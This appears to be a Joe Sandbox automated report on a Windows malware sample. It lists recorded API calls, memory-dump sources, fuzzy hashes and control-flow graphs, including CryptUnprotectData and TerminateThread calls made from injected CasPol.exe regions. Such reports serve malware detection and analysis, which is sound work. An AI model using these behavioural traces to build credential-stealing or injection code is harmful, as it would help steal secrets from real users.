                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F14
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                      • API String ID: 3248276644-3355392842
                                                                                                                      • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                                                                      • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                                                                                                                      • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                                                                      • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,00406672,80000002), ref: 00406451
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll), ref: 0040645C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseQueryValue
                                                                                                                      • String ID: Call
                                                                                                                      • API String ID: 3356406503-1824292864
                                                                                                                      • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                      • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                                                                                                                      • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                      • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • FreeLibrary.KERNEL32(?,76083420,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00403B78
                                                                                                                      Strings
                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Free$GlobalLibrary
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                      • API String ID: 1100898210-3355392842
                                                                                                                      • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                                                      • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                                                                                                                      • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                                                      • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBA
                                                                                                                      • CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                                                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 190613189-0
                                                                                                                      • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                      • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                                                                                                                      • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                      • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:21.1%
                                                                                                                      Dynamic/Decrypted Code Coverage:96.6%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:118
                                                                                                                      Total number of Limit Nodes:10
                                                                                                                      execution_graph 73360 1208480 73361 1208491 73360->73361 73363 12084b4 73360->73363 73362 12084e1 73363->73362 73364 1208557 LdrInitializeThunk 73363->73364 73365 1208573 73364->73365 73366 d0f472 73367 d0f47d 73366->73367 73369 d0f4ac 73366->73369 73368 d0f485 TerminateThread 73367->73368 73367->73369 73368->73369 73269 1dcba348 73270 1dcba38e GetCurrentProcess 73269->73270 73272 1dcba3d9 73270->73272 73273 1dcba3e0 GetCurrentThread 73270->73273 73272->73273 73274 1dcba41d GetCurrentProcess 73273->73274 73275 1dcba416 73273->73275 73276 1dcba453 73274->73276 73275->73274 73277 1dcba47b GetCurrentThreadId 73276->73277 73278 1dcba4ac 73277->73278 73370 1dcb6838 73371 1dcb6889 CreateWindowExW 73370->73371 73373 1dcb695c 73371->73373 73373->73373 73374 1dcb1ab8 73375 1dcb1ae7 73374->73375 73378 1dcb0824 73375->73378 73377 1dcb1c0c 73379 1dcb082f 73378->73379 73380 1dcb2172 73379->73380 73383 1dcb48d8 73379->73383 73392 1dcb48e8 73379->73392 73380->73377 73384 1dcb4913 73383->73384 73385 1dcb3800 2 API calls 73384->73385 73386 1dcb497a 73385->73386 73391 1dcb3800 2 API calls 73386->73391 73401 1dcb4e19 73386->73401 73387 1dcb4996 73388 1dcb3810 GetModuleHandleW 73387->73388 73389 1dcb49c2 73387->73389 73388->73389 73391->73387 73393 1dcb4913 73392->73393 73394 1dcb3800 2 API calls 73393->73394 73395 1dcb497a 73394->73395 73399 1dcb4e19 2 API calls 73395->73399 73400 1dcb3800 2 API calls 73395->73400 73396 1dcb4996 73397 1dcb3810 GetModuleHandleW 73396->73397 73398 1dcb49c2 73396->73398 73397->73398 73399->73396 73400->73396 73402 1dcb4e33 73401->73402 73403 1dcb4e37 73401->73403 73402->73387 73404 1dcb4f6e 73403->73404 73405 1dcb5020 2 API calls 73403->73405 73405->73404 73279 1dcba590 DuplicateHandle 73280 1dcba626 73279->73280 73281 1dc0d01c 73282 1dc0d034 73281->73282 73283 1dc0d08e 73282->73283 73289 1dcb69e0 73282->73289 73295 1dcb46e4 73282->73295 73303 1dcb69f0 73282->73303 73309 1dcb46d4 73282->73309 73313 1dcbb18c 73282->73313 73290 1dcb69f0 73289->73290 73291 1dcb46d4 2 API calls 73290->73291 73292 1dcb6a22 73291->73292 73293 1dcb46e4 CallWindowProcW 73292->73293 73294 1dcb6a37 73293->73294 73294->73283 73298 1dcb46ef 73295->73298 73296 1dcbb209 73329 1dcba184 73296->73329 73298->73296 73299 1dcbb1f9 73298->73299 73321 1dcbb32b 73299->73321 73325 1dcbb330 73299->73325 73300 1dcbb207 73304 1dcb6a16 73303->73304 73305 1dcb46d4 2 API calls 73304->73305 73306 1dcb6a22 73305->73306 73307 1dcb46e4 CallWindowProcW 73306->73307 73308 1dcb6a37 73307->73308 73308->73283 73310 1dcb46df 73309->73310 73333 1dcb470c 73310->73333 73312 1dcb6b27 73312->73283 73316 1dcbb1d5 73313->73316 73314 1dcbb209 73315 1dcba184 CallWindowProcW 73314->73315 73318 1dcbb207 73315->73318 73316->73314 73317 1dcbb1f9 73316->73317 73319 1dcbb32b CallWindowProcW 73317->73319 73320 1dcbb330 CallWindowProcW 73317->73320 73319->73318 73320->73318 73323 1dcbb33e 73321->73323 73322 1dcba184 CallWindowProcW 73322->73323 73323->73322 73324 1dcbb427 73323->73324 73324->73300 73327 1dcbb33e 73325->73327 73326 1dcba184 CallWindowProcW 73326->73327 73327->73326 73328 1dcbb427 73327->73328 73328->73300 73330 1dcba18f 73329->73330 73331 1dcbb4f2 CallWindowProcW 73330->73331 73332 1dcbb4a1 73330->73332 73331->73332 73332->73300 73334 1dcb4717 73333->73334 73339 1dcb3800 73334->73339 73336 1dcb6b89 73338 1dcb6bf7 73336->73338 73343 1dcb3810 73336->73343 73340 1dcb380b 73339->73340 73341 1dcb4e33 73340->73341 73347 1dcb5020 73340->73347 73341->73336 73344 1dcb5390 GetModuleHandleW 73343->73344 73346 1dcb5405 73344->73346 73346->73338 73348 1dcb5045 73347->73348 73349 1dcb3810 GetModuleHandleW 73348->73349 73350 1dcb508a 73348->73350 73349->73350 73351 1dcb3810 GetModuleHandleW 73350->73351 73359 1dcb5256 73350->73359 73352 1dcb51db 73351->73352 73353 1dcb52b1 73352->73353 73356 1dcb3810 GetModuleHandleW 73352->73356 73352->73359 73353->73341 73354 1dcb53d8 GetModuleHandleW 73355 1dcb5405 73354->73355 73355->73341 73357 1dcb5229 73356->73357 73358 1dcb3810 GetModuleHandleW 73357->73358 73357->73359 73358->73359 73359->73353 73359->73354

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 214 d0f35c-d0f3c0 215 d0f3c3-d0f3ef 214->215 215->215 216 d0f3f1-d0f4cb TerminateThread 215->216 223 d0f4d1-d0f50b 216->223 224 d0f653-d0f6a1 216->224 223->224 227 d0f511-d0f515 223->227 227->224 228 d0f51b-d0f51f 227->228 228->224 229 d0f525-d0f529 228->229 229->224 230 d0f52f-d0f533 229->230 230->224 231 d0f539-d0f53d 230->231 231->224 232 d0f543-d0f572 231->232 232->224 234 d0f578-d0f5c8 232->234 237 d0f5c9-d0f5d7 234->237 238 d0f622-d0f64c 237->238 239 d0f5d9-d0f5e0 237->239 239->224 240 d0f5e2-d0f61d 239->240 240->237
                                                                                                                      APIs
                                                                                                                      • TerminateThread.KERNEL32(45817C27,19F398C5), ref: 00D0F4A2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255487605990.0000000000D0F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00D0F000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_d0f000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: TerminateThread
                                                                                                                      • String ID: .O4x
                                                                                                                      • API String ID: 1852365436-4288399125
                                                                                                                      • Opcode ID: edae60daeae10029a22f4ffc05cdb6324320142ed3c4f9a863dd5fe22e910577
                                                                                                                      • Instruction ID: 814905fc2bd1599ff46b5f992bade76f65c07a50a8ffd428db93eeffa94e36a0
                                                                                                                      • Opcode Fuzzy Hash: edae60daeae10029a22f4ffc05cdb6324320142ed3c4f9a863dd5fe22e910577
                                                                                                                      • Instruction Fuzzy Hash: F74127756043068EDB309F28C9997D637A3AF61794FBD8176CC8C8B6A1D332C985C722
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255489784172.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_1160000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 31798467c8d796c7afc0ac7614e4b4e697eb3dc34735d80c9996f1bc79bc2c62
                                                                                                                      • Instruction ID: 0f27cdee7b8828a2771fcfb7a55686f01bbc0d1d64f794a51528cd6cc3a2e3d0
                                                                                                                      • Opcode Fuzzy Hash: 31798467c8d796c7afc0ac7614e4b4e697eb3dc34735d80c9996f1bc79bc2c62
                                                                                                                      • Instruction Fuzzy Hash: 4E51B375B142049FCB08EBB4C888ADEB7BAAF89204F158969E1129B395EF71EC04C751
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 0122DF45
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255490469476.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_1220000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CryptDataUnprotect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 834300711-0
                                                                                                                      • Opcode ID: 79317888a5725ec46146d575541f34c0e748f9fdd302e34865131a48297a7667
                                                                                                                      • Instruction ID: 52ad261b26ecc8ca3a15f4e5fc1a28dbd062abc2de056b82a6f1364a37581f28
                                                                                                                      • Opcode Fuzzy Hash: 79317888a5725ec46146d575541f34c0e748f9fdd302e34865131a48297a7667
                                                                                                                      • Instruction Fuzzy Hash: 741114B28002499FDB10CF99C945BEEBFF4EF48320F148419EA14A7611D375A954DFA5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 0122DF45
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255490469476.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_1220000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CryptDataUnprotect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 834300711-0
                                                                                                                      • Opcode ID: de40b9caa4321c50c39110d0c0c9edb82fbec26ec9be263bc9e09bc2fc53d791
                                                                                                                      • Instruction ID: 8ee1729b54239483980d14329dbce14f7ea385297088a922a215f50dabef169b
                                                                                                                      • Opcode Fuzzy Hash: de40b9caa4321c50c39110d0c0c9edb82fbec26ec9be263bc9e09bc2fc53d791
                                                                                                                      • Instruction Fuzzy Hash: 121167B2800289DFDB10CF99C844BEEBFF4EF88320F148819EA54A7650C335A954DFA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 1DCBA3C6
                                                                                                                      • GetCurrentThread.KERNEL32 ref: 1DCBA403
                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 1DCBA440
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 1DCBA499
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255512461258.000000001DCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1DCB0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_1dcb0000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Current$ProcessThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2063062207-0
                                                                                                                      • Opcode ID: 7e8fea625aea78c276d754aedae3d6a47cc47f138fd8fa5914435c69bca88dc9
                                                                                                                      • Instruction ID: 905dd4ca684f05ea221cf8a39a20427ff5c59796854c97b3833639c9f0293a8b
                                                                                                                      • Opcode Fuzzy Hash: 7e8fea625aea78c276d754aedae3d6a47cc47f138fd8fa5914435c69bca88dc9
                                                                                                                      • Instruction Fuzzy Hash: 425169B0900649CFEB14CFA9D588BEEBBF1EF88314F208859D409A7351DB74A944CF66
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 121 1dcb5020-1dcb5056 124 1dcb5058-1dcb506f 121->124 125 1dcb50a7-1dcb50af 121->125 130 1dcb5079 124->130 131 1dcb5071-1dcb5077 124->131 126 1dcb50b1-1dcb50b6 call 1dcb4618 125->126 127 1dcb50f5-1dcb513e call 1dcb4624 125->127 133 1dcb50bb-1dcb50f0 126->133 151 1dcb52eb-1dcb531d 127->151 152 1dcb5144-1dcb518f 127->152 134 1dcb507f-1dcb5085 call 1dcb3810 130->134 131->134 142 1dcb5192-1dcb51eb call 1dcb3810 call 1dcb4630 133->142 138 1dcb508a-1dcb50a1 call 1dcb460c 134->138 138->125 145 1dcb52bd-1dcb52e4 138->145 174 1dcb51f0-1dcb51f4 142->174 145->151 169 1dcb5324-1dcb5368 151->169 152->142 182 1dcb536a-1dcb536c 169->182 183 1dcb53a4-1dcb53b9 169->183 175 1dcb51fa-1dcb5207 174->175 176 1dcb52b1-1dcb52bc 174->176 180 1dcb52ad-1dcb52af 175->180 181 1dcb520d-1dcb523a call 1dcb3810 call 1dcb4624 175->181 180->169 180->176 181->180 197 1dcb523c-1dcb524a 181->197 184 1dcb536e-1dcb537e 182->184 185 1dcb53bc-1dcb53d0 182->185 183->185 187 1dcb53d8-1dcb5403 GetModuleHandleW 185->187 188 1dcb53d2-1dcb53d5 185->188 189 1dcb540c-1dcb5420 187->189 190 1dcb5405-1dcb540b 187->190 188->187 190->189 197->180 198 1dcb524c-1dcb5263 call 1dcb3810 call 1dcb463c 197->198 203 1dcb5270-1dcb529f call 1dcb4630 198->203 204 1dcb5265-1dcb526e call 1dcb4630 198->204 203->180 212 1dcb52a1-1dcb52ab 203->212 204->180 212->180 212->203
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 1DCB53F6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255512461258.000000001DCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1DCB0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_1dcb0000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleModule
                                                                                                                      • String ID: #
                                                                                                                      • API String ID: 4139908857-3629985089
                                                                                                                      • Opcode ID: 7d2c9c9e65fc9d64c596def01fcd34ecc320ab8407a52e04b271d14ebd0f6b0e
                                                                                                                      • Instruction ID: e6d59a31a81432dcc2ce314d73cc9874a4fc1aebd3b90c5a1e3ac287cf8bda7d
                                                                                                                      • Opcode Fuzzy Hash: 7d2c9c9e65fc9d64c596def01fcd34ecc320ab8407a52e04b271d14ebd0f6b0e
                                                                                                                      • Instruction Fuzzy Hash: 58C18174A047498FDB04DFB9C480AAEBBF5FF88254B11892AD506DB751EB34F805CB92
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: c31f68d63b5b6a36a1a5a93b95a342c7d826c5f84a44d77875321f8f60da7879
                                                                                                                      • Instruction ID: cccb79a2042a9f9008cb784dfa32472d9784540cd14826863119eeb468f08f16
                                                                                                                      • Opcode Fuzzy Hash: c31f68d63b5b6a36a1a5a93b95a342c7d826c5f84a44d77875321f8f60da7879
                                                                                                                      • Instruction Fuzzy Hash: 75A215B4A14228CFDB65AF70C88879DBBB6BB89305F2045EAD50DA3354DB349E85CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 0326c8ad3a8a34079c2f7d79d0ae50e5f9bad5e8bfdfb9ea7c22f2b09b9bd743
                                                                                                                      • Instruction ID: 0a805615fa19391141a73e70f3df5ae89078c4dae5b94241db07432fe52b7f69
                                                                                                                      • Opcode Fuzzy Hash: 0326c8ad3a8a34079c2f7d79d0ae50e5f9bad5e8bfdfb9ea7c22f2b09b9bd743
                                                                                                                      • Instruction Fuzzy Hash: 3862F274A14224CFCB69AF70C98879DBBB6BB89305F2085EAD50DA3354DB349E85CF11
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 9c647bc96ea5c9628eaa6e5ce236d8c758382c2b7c0347f0d7e9b8f96a470870
                                                                                                                      • Instruction ID: d2684266477fad14bab68e1363e71165e72b5a5f8a9c4336928ac64de4ab5360
                                                                                                                      • Opcode Fuzzy Hash: 9c647bc96ea5c9628eaa6e5ce236d8c758382c2b7c0347f0d7e9b8f96a470870
                                                                                                                      • Instruction Fuzzy Hash: A862F374A14224CFCB69AF70C98879DBBB6BB89305F2085EAD50DA3354DB349E85CF11
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: b9a59a3502d0db1045a965a17b53431cef5a9adc7c5dc7118f830b6490a48916
                                                                                                                      • Instruction ID: 47be35872fc78b596d0c62c2e2654b50d9bd64c0c23f32113cacfa770c189197
                                                                                                                      • Opcode Fuzzy Hash: b9a59a3502d0db1045a965a17b53431cef5a9adc7c5dc7118f830b6490a48916
                                                                                                                      • Instruction Fuzzy Hash: 0E52F374A14224CFDB69AF70C88879DBBB6BB89305F2085EAD50DA3354DB349E85CF11
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: ff348196d1ebd85cf17e0904e240cdf61e797b65fc0670ca51b22c1970758993
                                                                                                                      • Instruction ID: 71b5d428434787f61dbd4e580f7991419575a576c20396187d95e3dcf4511936
                                                                                                                      • Opcode Fuzzy Hash: ff348196d1ebd85cf17e0904e240cdf61e797b65fc0670ca51b22c1970758993
                                                                                                                      • Instruction Fuzzy Hash: E2520374A14224CFCB69AF70C98879DBBB6BB89305F2085EAD50DA3354DB349E85CF11
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
